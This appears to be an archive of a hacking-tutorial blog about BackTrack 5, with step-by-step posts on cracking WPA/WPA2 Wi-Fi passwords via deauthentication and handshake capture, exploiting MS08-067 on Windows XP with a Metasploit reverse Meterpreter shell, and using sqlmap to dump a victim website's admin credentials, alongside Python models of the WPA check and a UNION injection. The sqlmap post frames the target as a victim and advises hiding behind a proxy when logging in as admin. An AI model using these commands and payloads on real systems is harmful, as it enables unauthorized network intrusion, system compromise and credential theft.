Visit our official website APAJR Lab


Showing posts with label Back Track Tutorial.

Saturday, 2 March 2013

HACK WIFI PASSWORD WITH BACKTRACK 5 | .::APAJR::.



WARNING: Only test routers you own or are explicitly authorized to assess. Attacking anyone else's network is a crime and can land you in jail.

What you need


    • A BackTrack Live CD: the Linux Live CD that lets you do all sorts of security testing and tasks. Download yourself a copy of the CD and burn it, or load it up in VMware to get started.

    • Here is the download link: http://www.backtrack-linux.org/downloads/

    • A nearby WPA/WPA2-PSK Wi-Fi network that you are authorized to test, with at least one connected client (the attack captures the 4-way handshake a client performs when it (re)connects).

    • Patience with the command line. This is a ten-step process that requires typing in long, arcane commands and waiting around for your Wi-Fi card to collect data in order to crack the password. Like the doctor said to the short person, be a little patient.


Steps to Follow:

Step 1 :

airmon-ng

The result will be something like :

Interface    Chipset      Driver
wlan0        Intel 5100   iwlagn - [phy0]


Step 2 :

airmon-ng start wlan0

This puts the card into monitor mode and creates a monitor interface, usually mon0, which the following steps use.

Step 3 (Optional) :

Change the MAC address of the mon0 interface, so that your card's real hardware address does not appear in the traffic you send.

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

Step 4 :

airodump-ng mon0

This lists the nearby networks. Note your target's BSSID, its channel (CH column) and the MAC of a connected client (STATION column), then press Ctrl+C to stop the program. Without an associated client there is no handshake to capture.

Step 5 :

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff --ivs mon0

*where -c is the channel of the target network (from step 4)
-w is the prefix of the capture file (airodump-ng appends -01, giving wpacrack-01.ivs)
--bssid is the BSSID of the target AP (ff:ff:ff:ff:ff:ff is a placeholder; use the real one)
--ivs keeps only the IVs and the handshake, which is enough for aircrack-ng; leave it out if you intend to use pyrit, which needs the full .cap file

Leave this terminal running.

Step 6 :

Open another terminal.

aireplay-ng -0 1 -a ff:ff:ff:ff:ff:ff -c 99:88:77:66:55:44 mon0

*where -0 1 sends one round of deauthentication frames
-a is the BSSID
-c is the client MAC address (STATION from step 4)

The deauthenticated client reconnects and performs a fresh 4-way handshake, which airodump-ng records. Wait until airodump-ng shows "WPA handshake: <BSSID>" in its top-right corner; if it does not appear, repeat with a larger count (e.g. -0 5) or wait for a client to join on its own.

Step 7 :

Crack the WPA/WPA2 passphrase with aircrack-ng, using the word list that ships with John the Ripper on BackTrack:

aircrack-ng -w /pentest/passwords/john/password.lst wpacrack-01.ivs

aircrack-ng stops with "KEY FOUND!" if the passphrase is in the list. The attack is only as good as the word list: WPA/WPA2-PSK has no known shortcut, and every candidate costs 4096 rounds of PBKDF2.

Step 8 (Optional) :

If you do not want to use the John the Ripper word list, you can generate candidates with Crunch instead.

Go to the official site of crunch.
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Download crunch 3.0 (the current version at the time of this writing).
http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/crunch-3.0.tgz/download

tar -xvzf crunch-3.0.tgz
cd crunch-3.0
make
make install

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng wpacrack-01.ivs -b ff:ff:ff:ff:ff:ff -w -

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters, and -w - makes aircrack-ng read the word list from standard input. Be realistic about the keyspace: mixalpha-numeric-all-space is roughly 95 symbols, so length 8 alone is about 6.6 x 10^15 candidates, which at the ~17,000 PMK/s a GPU manages (see the Remarks) would take thousands of years. Brute force only pays off for short or structured keyspaces; a good word list or a targeted crunch pattern (-t) is the better bet.

(B) nVidia display card with CUDA

If you have an nVidia card with CUDA support, you can use pyrit, fed by crunch, to crack the passphrase on the GPU, which computes PMKs far faster than aircrack-ng on the CPU.

Steps a to f :

Steps a to f are identical to steps 1 to 6 above (airmon-ng, airmon-ng start wlan0, the optional MAC change, airodump-ng mon0 to pick the target, the capture, and the deauthentication with aireplay-ng), with one difference in the capture command: drop --ivs, because pyrit needs the complete .cap file rather than an IVs-only file.

airodump-ng -c 3 -w wpacrack --bssid ff:ff:ff:ff:ff:ff mon0

Wait for the handshake as before.

Step g :

If the following packages are not yet installed, install them:

apt-get install libghc6-zlib-dev libssl-dev python-dev libpcap-dev python-scapy

Step h :

Install crunch exactly as in step 8 above (download crunch 3.0 from the SourceForge link, then tar -xvzf, cd, make, make install). Skip this if you already did it.

Step i :

Go to the official site of pyrit.

http://code.google.com/p/pyrit/downloads/list

Download pyrit and cpyrit-cuda (the current version is 0.4.0 at the time of this writing).

tar -xzvf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
sudo python setup.py install

tar -xzvf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
python setup.py build
sudo python setup.py install

Step j :

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r wpacrack-01.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

*where 8 16 is the length of the password, i.e. from 8 characters to 16 characters; -i - makes pyrit read candidates from standard input (the crunch pipe), -r is the capture file, -b the target BSSID, --all-handshakes tries every handshake found in the capture, and attack_passthrough computes PMKs on the fly without storing them in pyrit's database.

Step k (Optional) :

If pyrit reports an error when reading wpacrack-01.cap, strip the capture down to the packets pyrit needs and run the attack on the stripped file:

pyrit -r wpacrack-01.cap -o new.cap stripLive

/pentest/passwords/crunch/crunch 8 16 -f /pentest/passwords/crunch/charset.lst mixalpha-numeric-all-space-sv | pyrit --all-handshakes -r new.cap -b ff:ff:ff:ff:ff:ff -i - attack_passthrough

Step l :

You will then see output similar to the following.

Pyrit 0.4.0 (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'new.cap' (1/1)...
Parsed 71 packets (71 802.11-packets), got 55 AP(s)

Tried 17960898 PMKs so far; 17504 PMKs per second.

Remarks :

With an nVidia GeForce GTX460 (336 CUDA cores), pyrit computes about 17,000 PMKs per second, i.e. about 17,000 candidate passphrases per second.

To test whether your wireless card (USB or PCI-e) can do packet injection:

airodump-ng mon0
Open another terminal.
aireplay-ng -9 mon0

"Injection is working!" in the output means the card and driver support it. Without injection the deauthentication in step 6 does nothing, and you have to wait for a client to connect on its own.

Make sure pyrit works on your system and can see your GPU:

pyrit list_cores
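What the cracking step in steps 7, 8 and j actually computes, as an added example that is not part of the original post: a self-contained Python model of the WPA/WPA2-PSK handshake check that aircrack-ng and pyrit perform for every candidate (PBKDF2 to the PMK, the 802.11i PRF to the KCK, then the EAPOL-Key MIC), run as a dictionary attack against a constructed handshake, plus the keyspace arithmetic behind the crunch caveat. The SSID, MAC addresses, nonces and passphrase are made-up placeholders, and the handshake is synthesized from the known passphrase rather than read from a capture; the real tools parse the same fields out of wpacrack-01.cap.

```python
import hashlib
import hmac

# Constructed stand-in for the fields airodump-ng would save. These MACs and
# nonces are made-up placeholders, not values from any real capture.
SSID = "APAJR-Lab"                       # hypothetical network name
TRUE_PASSPHRASE = "Patience1"            # secret the attack must recover; used only to fake the capture
AP_MAC = bytes.fromhex("001122334455")   # BSSID placeholder
STA_MAC = bytes.fromhex("998877665544")  # STATION placeholder (the client that was deauthed)
ANONCE = hashlib.sha256(b"anonce").digest()  # 32-byte nonces, deterministic for the demo
SNONCE = hashlib.sha256(b"snonce").digest()


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 32 bytes).
    This is the slow step; it is what pyrit offloads to the GPU."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """IEEE 802.11i PRF-512: HMAC-SHA1(key, label || 0x00 || data || i), i = 0..3, concatenated."""
    out = b"".join(hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
                   for i in range(4))
    return out[:64]


def kck_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK = PRF-512(PMK, "Pairwise key expansion", min/max of the MACs and nonces).
    Only the first 16 bytes (the KCK) are needed to check the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)[:16]


def eapol_mic(kck, eapol_frame, key_version):
    """MIC over the EAPOL-Key frame with its 16-byte MIC field (offset 81) zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) HMAC-SHA1 cut to 16 bytes."""
    zeroed = eapol_frame[:81] + b"\x00" * 16 + eapol_frame[97:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 (client -> AP) with a zeroed MIC field."""
    body = (bytes([2])                     # descriptor type 2 = RSN
            + (0x010A).to_bytes(2, "big")  # key info: version 2, pairwise, MIC bit set
            + (16).to_bytes(2, "big")      # key length
            + (1).to_bytes(8, "big")       # replay counter
            + snonce                       # key nonce (32 bytes)
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8  # IV, RSC, key ID
            + b"\x00" * 16                 # MIC placeholder, bytes 81..96 of the frame
            + (0).to_bytes(2, "big"))      # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body  # EAPOL v1, type 3 = Key


def build_handshake(passphrase):
    """Fake the captured handshake: public fields plus the MIC a real client would have sent."""
    eapol = build_eapol_msg2(SNONCE)
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    mic = eapol_mic(kck, eapol, 2)
    return {"ssid": SSID, "ap": AP_MAC, "sta": STA_MAC, "anonce": ANONCE, "snonce": SNONCE,
            "version": 2, "eapol": eapol[:81] + mic + eapol[97:], "mic": mic}


HANDSHAKE = build_handshake(TRUE_PASSPHRASE)


def recover_passphrase(hs, wordlist):
    """The aircrack-ng / pyrit inner loop: PMK -> KCK -> MIC per candidate, then compare."""
    for cand in wordlist:
        if not 8 <= len(cand) <= 63:     # WPA-PSK passphrases are 8..63 characters; skip the rest
            continue
        kck = kck_from_pmk(pmk_from_passphrase(cand, hs["ssid"]),
                           hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"], hs["version"]), hs["mic"]):
            return cand
    return None


def crunch_keyspace(charset_size, min_len, max_len):
    """Number of candidates crunch emits for lengths min_len..max_len over charset_size symbols."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def years_to_exhaust(keyspace, pmk_per_second):
    return keyspace / pmk_per_second / (365 * 24 * 3600)


if __name__ == "__main__":
    print("recovered:", recover_passphrase(HANDSHAKE, ["password", "letmein1", "Patience1"]))
    # length 8 alone, ~95 printable symbols, at the GTX460 rate quoted in the Remarks
    print("years for crunch 8 8 at 17504 PMK/s: %.0f"
          % years_to_exhaust(crunch_keyspace(95, 8, 8), 17504))
```

The only secret-dependent input is the passphrase; everything else (SSID, both MACs, both nonces, the EAPOL frame and its MIC) is visible in the capture, which is why a single handshake is enough for an offline attack and why the PBKDF2 cost per candidate is the sole thing limiting the attacker.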

That's all! See you.





[Metasploit Tutorial] Hacking Windows XP using IP Address | Back Track | .::APAJR::.





Do you think it is possible to hack someone's computer with just an IP address? The answer is yes, if the target is running an unpatched (vulnerable) OS. If you don't believe me, read the full article.

In this article I am going to demonstrate how to compromise a remote computer by exploiting the parsing flaw in the path canonicalization code of NetAPI32.dll, reachable through the Server service (CVE-2008-4250). Before we jump into the actual exploitation, let me give some more detail about this Server service vulnerability.

Details about Server Service Vulnerability(MS08-067):
Microsoft Windows Server service provides support for sharing resources such as files and print services over the network.

The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The 'NetprPathCanonicalize()' function in the 'netapi32.dll' file is affected.

A single malicious request to a vulnerable system results in complete compromise of the machine.
This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue.

Exploiting the MS08-067 using Metasploit:

Requirements:

  • VirtualBox

  • Backtrack 5

  • Target OS(XP)

Step 1:

Create two virtual machines named "Target" and "BT5". Install Windows XP in Target and BackTrack in BT5, then start both VMs.

If you don't know how to create virtual machines , then please read this VirtualBox Manual.

Step 2: Find the IP address of the Target
Open the command prompt in the Target machine (XP) and type "ipconfig" to find its IP address.
Attackers use different methods to find a victim's IP address, for example by sending a link that logs the visitor's IP, or by sweeping a range with a scanner such as Angry IP Scanner.

Step 3: Information Gathering
Now let us collect some information about the Target machine. For this we use nmap.

Open a terminal in the BT5 machine (BackTrack) and type "nmap -O 192.168.56.12", where 192.168.56.12 is the IP address of the Target machine. The result lists the open ports and the OS version. For MS08-067 you need to see TCP port 445 (microsoft-ds) or 139 (netbios-ssn) open; if SMB is not reachable, the exploit cannot work.

Step 4: Metasploit
Now open a terminal in the BT5 machine (BackTrack) and type "msfconsole".

The msfconsole is the most popular interface to the Metasploit Framework. It provides an "all-in-one" centralized console and gives you efficient access to virtually all of the options available in the framework.

Let us use the search command to find exploit modules with the keyword netapi. Type "search netapi"; you will see the list of modules matching netapi.

We are going to exploit MS08-067, so type "use exploit/windows/smb/ms08_067_netapi".

Step 5: Set Payload
As usual, let us use the reverse TCP Meterpreter payload for this exploit. Type "set payload windows/meterpreter/reverse_tcp" in the msfconsole.

Step 6: Options
Type "set LHOST 192.168.56.10".  Here 192.168.56.10 is IP address of Backtrack machine.  You can find the ip address by typing 'ifconfig' command in the Terminal.

Type "set RHOST 192.168.56.12".  Here 192.168.56.12 is IP address of Target machine.

Step 7: Exploiting
Type "check" first; the module probes the Server service and reports whether the target appears vulnerable. Then type "exploit". If the exploit succeeds, a Meterpreter session opens on the console ("Meterpreter session 1 opened ...").

Now we can control the remote computer through Meterpreter. For example, typing "screenshot" grabs a screenshot of the victim's desktop.

Countermeasures:
Apply the MS08-067 update (KB958644) and keep the OS patched; block TCP 139 and 445 from untrusted networks with a host or network firewall; and disable the Server service on machines that do not share files or printers.




Tuesday, 26 February 2013

hack website using backtrack sqlmap | .::APAJR::.

Today I will show you how to extract a website's admin password with sqlmap on BackTrack.



1. Open a terminal in BackTrack, type cd /pentest/database/sqlmap and hit Enter. sqlmap is now available in your terminal.
2. Find a site with an injectable parameter (the example below uses a site that was already known to be vulnerable).
3. Type this command in the terminal and hit Enter to enumerate the databases:
python sqlmap.py -u "http://yourvictim'slink/index.php?id=4" --dbs

4. sqlmap reports the database names.

Here it found two databases, aj and information_schema (MySQL's own catalog, present on every server); we select aj.

5. Now list the tables of that database. The general form of the command is:
python sqlmap.py -u "http://yourvictim'slink/index.php?id=4" -D (database name) --tables

6. For the aj database that is:
python sqlmap.py -u "http://www.yourvictim'slink.com/index.php?id=4" -D aj --tables




7. sqlmap prints the list of tables stored in the aj database; one of them is admin.



8. Now grab the columns of the admin table:
python sqlmap.py -u "http://www.yourvictim'slink.com/index.php?id=4" -D aj -T admin --columns

Among the columns are username and password.
9. Now dump those two columns from the admin table (-C selects the columns to dump):
python sqlmap.py -u "http://www.yourvictim'slink.com/index.php?id=4" -D aj -T admin -C username,password --dump

Now we have the username and password of the site's admin. If the password column holds a hash rather than plaintext, sqlmap offers to crack it with a dictionary when it dumps.

Now find the admin panel of the website, and use a proxy/VPN when you log in as the admin.
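What sqlmap automates in steps 3 to 9, as an added example that is not from the original post or from sqlmap: a Python/SQLite model of a page like index.php?id=4 that concatenates the parameter into its query, the UNION payloads that read the table catalog and dump the admin table through it, and the parameterized version that defeats the same payloads. The database, its tables and the credentials are constructed for the demo, and SQLite's sqlite_master stands in for MySQL's information_schema.

```python
import sqlite3


def build_demo_db():
    """Constructed stand-in for the site's database: an 'items' table behind index.php?id=
    and an 'admin' table holding the credentials the tutorial dumps."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE items (id INTEGER PRIMARY KEY, name TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO items VALUES (4, 'BackTrack 5 R3 ISO');
        INSERT INTO admin VALUES (1, 'test', 's3cret-hash');
    """)
    return conn


def lookup_vulnerable(conn, id_param):
    """What a vulnerable index.php does: glue the id parameter straight into the SQL text."""
    query = "SELECT name FROM items WHERE id = " + id_param
    return [row[0] for row in conn.execute(query)]


def lookup_safe(conn, id_param):
    """Hardened version: validate the type, then bind the value as a parameter so the
    database never parses attacker input as SQL."""
    try:
        item_id = int(id_param)
    except ValueError:
        return []
    return [row[0] for row in conn.execute("SELECT name FROM items WHERE id = ?", (item_id,))]


def sqli_list_tables(lookup):
    """Equivalent of sqlmap --tables: UNION in the catalog. SQLite's catalog is sqlite_master;
    on MySQL the same trick reads information_schema.tables."""
    return lookup("4 UNION SELECT name FROM sqlite_master WHERE type='table'")


def sqli_dump_admin(lookup):
    """Equivalent of -T admin -C username,password --dump. id=-1 empties the legitimate
    half of the UNION so only the stolen rows come back."""
    return lookup("-1 UNION SELECT username || ':' || password FROM admin")


if __name__ == "__main__":
    conn = build_demo_db()
    vuln = lambda p: lookup_vulnerable(conn, p)
    safe = lambda p: lookup_safe(conn, p)
    print("tables via injection:", sqli_list_tables(vuln))
    print("admin dump via injection:", sqli_dump_admin(vuln))
    print("same payloads against the parameterized query:",
          sqli_list_tables(safe), sqli_dump_admin(safe))
```

The payload shapes are the interesting part: sqlmap first finds how many columns the original SELECT returns so its UNION lines up, then walks the catalog (--dbs, --tables, --columns) before pulling rows (--dump). The fix is not filtering the parameter but never letting it reach the parser as SQL, which is what the bound parameter in lookup_safe does.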

Tuesday, 4 December 2012

How to install backtrack5 on virtual machine | .::APAJR::.

You can install BackTrack 5 on your system in many ways: as the primary OS, as a virtual machine under Windows, or dual-booting alongside another operating system such as Windows.
The best way for a learner is to run BackTrack as a virtual machine; that way you can use it easily alongside Windows.


In this tutorial i will show you how to setup backtrack as a virtual machine on your system.


First of all download the backtrack5 from the website
http://www.backtrack-linux.org/downloads/


Then download VMWARE WORKSTATION
http://downloads.vmware.com/


Install VMware workstation on your system and create a new Virtual machine.


Select Custom (advanced).

Choose the virtual machine hardware compatibility; just click Next for the defaults.
Select "Installer disc image file" and browse to the BackTrack ISO.

When asked for the guest operating system, select Linux, then choose "Other Linux 2.6.x kernel" as the version.
Give a name to your virtual machine.
In the memory configuration, set the memory for your virtual machine; I recommend 512 MB.
For the network type choose NAT.
Select the SCSI adapter type and choose LSI Logic.
Set the maximum disk size; I recommend 10 GB or more.
Choose "Store virtual disk as a single file".
Specify the disk file and click Next.


Now BackTrack should boot from the ISO.

After it loads, log in and type startx to enter the GUI.

Now run the "Install BackTrack" icon on the desktop to install it to the virtual disk.

Sunday, 2 December 2012

BackTrack 5 R3 [Released] | .::APAJR::.

BackTrack 5 R3 was released on 13 August 2012; you can download it from: http://www.backtrack-linux.org/downloads/


The time has come to refresh our security tool arsenal – BackTrack 5 R3 has been released. R3 focuses on bug-fixes as well as the addition of over 60 new tools – several of which were released in BlackHat and Defcon 2012. A whole new tool category was populated – “Physical Exploitation”, which now includes tools such as the Arduino IDE and libraries, as well as the Kautilya Teensy payload collection.

Building, testing and releasing a new BackTrack revision is never an easy task. Keeping up-to-date with all the latest tools, while balancing their requirements of dependencies, is akin to a magic show juggling act. Thankfully, active members of our redmine community such as backtracklover and JudasIscariot make our task that much easier by actively reporting bugs and suggesting new tools on a regular basis. Hats off to the both of you.

We would like to thank Offensive Security for providing the BackTrack dev team with the funding and resources to make all of this happen. Also, a very special thanks to dookie, our lead developer – for building, testing and packaging most of the new tools in this release.

Together with our usual KDE and GNOME, 32/64 bit ISOs, we have released a single VMware Image (Gnome, 32 bit). For those requiring other VM flavors of BackTrack – building your own VMWare image is easy – instructions can be found in the BackTrack Wiki.

Lastly, if you’re looking for intensive, real world, hands on Penetration Testing Training – make sure to drop by Offensive Security Training, and learn the meaning of “TRY HARDER“.

For the insanely impatient, you can download the BackTrack 5 R3 release via torrent right now. Direct ISO downloads will be available once all our HTTP mirrors have synched, which should take a couple more hours. Once this happens, we will update our BackTrack Download page with all links.

Backtrack Basic commands Learning for beginners | .::APAJR::.

OK guys, here I am giving you a list of commands for those who want to learn basic BackTrack commands.
Check them all; if you have any problem following any command, leave a comment below.





How to Log in


Once the installation of BackTrack is done, the default username and password required to log in are root (username) / toor (password). Every BackTrack install starts with this same password, so change it as soon as you can (see "How to Change the Root Password" below).

How to Open GUI Environment BackTrack


After you are logged in you can start the GUI environment by issuing the startx command.

How to check IP address


root@bt:~# ifconfig

How to Setup IP Address Manually


root@bt:~# ifconfig eth0 192.168.1.8

root@bt:~# route add default gw 192.168.1.1

root@bt:~# echo nameserver 192.168.1.1 > /etc/resolv.conf

How to Change the Root Password


root@bt:~# passwd
Enter new UNIX password: {enter your new password here}
Retype new UNIX password: {enter your new password again}
passwd: password updated successfully

How to start and stop services


root@bt:~# /etc/init.d/openvpn start
Starting Virtual private network daemon(s)…

root@bt:~# /etc/init.d/openvpn stop

How to check kernel version


Use uname -a to show the kernel version.

Common Apt Commands


apt-get install <package> Downloads <package> and all of its dependencies, and installs or upgrades them.

apt-get remove [--purge] <package> Removes <package> and any packages that depend on it. --purge specifies that packages should be purged.

apt-get update Updates package listings from the repository; should be run at least once a week.

apt-get upgrade Upgrades all currently installed packages with the updates available from the repository; should be run once a week.

apt-get dist-upgrade [-u] Similar to apt-get upgrade, except that dist-upgrade will install or remove packages to satisfy dependencies.

apt-cache search <pattern> Searches package names and descriptions for <pattern>.

apt-cache show <package> Shows the full description of <package>.

apt-cache showpkg <package> Shows a lot more detail about <package> and its relationships to other packages.

man apt Will give you more info on these commands as well as many that are in less common usage.


Common dpkg commands


dpkg -i <package.deb> Installs a package file; one that you downloaded manually, for example.

dpkg -c <package.deb> Lists the contents of a .deb file.

dpkg -I <package.deb> Extracts package information from a .deb file.

dpkg -r <package> Removes an installed package named <package>.

dpkg -P <package> Purges an installed package named <package>. The difference between remove and purge is that while remove only deletes data and executables, purge also deletes all configuration files in addition.

dpkg -L <package> Gives a listing of all the files installed by <package>. See also dpkg -c for checking the contents of a .deb file.

dpkg -s <package> Shows information on the installed package <package>. See also apt-cache show for viewing package information in the Debian archive and dpkg -I for viewing package information extracted from a .deb file.

dpkg-reconfigure <package> Reconfigures an installed package.

man dpkg Will give you more info on these commands as well as many that are in less common usage.

This is Part 1; I will post more basic commands for BackTrack 5, so stay connected to learn more.

Free Learn Hacking Tutorials and Penetration Testing on Backtrack 5 | .::APAJR::.

Hello friends, I have decided to post a series of articles on BackTrack penetration testing. I will explain many attacks with BackTrack, and penetration testing with the BackTrack OS, in simple language. So why wait? Start reading the articles on BackTrack at home from HackerHub and become BackTrack friendly.





This is the Introduction part of the Backtrack OS:


BackTrack is a GNU/Linux distribution distributed as a Live DVD aimed at digital forensics use and penetration testing.

BackTrack is intended for all audiences from the most savvy security professionals to early newcomers to the information security field. BackTrack promotes a quick and easy way to find and update the largest database of security tools collection to-date. Our community of users range from skilled penetration testers in the information security field, government entities, information technology, security enthusiasts, and individuals new to the security community.

BackTrack is a Linux-based penetration testing arsenal that aids security professionals and experts in performing assessments in a purely native environment dedicated to hacking. Whether you install BackTrack to disk or boot it from a Live DVD or a thumb drive, the distribution has been customized down to every package, kernel configuration, script and patch solely for the purpose of the penetration tester.

Tools


BackTrack includes many well known security tools including:
Metasploit integration
RFMON Injection capable wireless drivers
Kismet
Nmap
Ophcrack
Ettercap
Wireshark (formerly known as Ethereal)
BeEF (Browser Exploitation Framework)
Hydra
Cisco OCS Mass Scanner, a very reliable and fast scanner for Cisco routers with the default telnet/enable password
Quypt (terminal emulator), private software from the Crimson Hacking group that leaked to the mainstream
A large collection of exploits as well as more commonplace software such as browsers.
Etc...and Many More

Download it from here

http://www.backtrack-linux.org/downloads/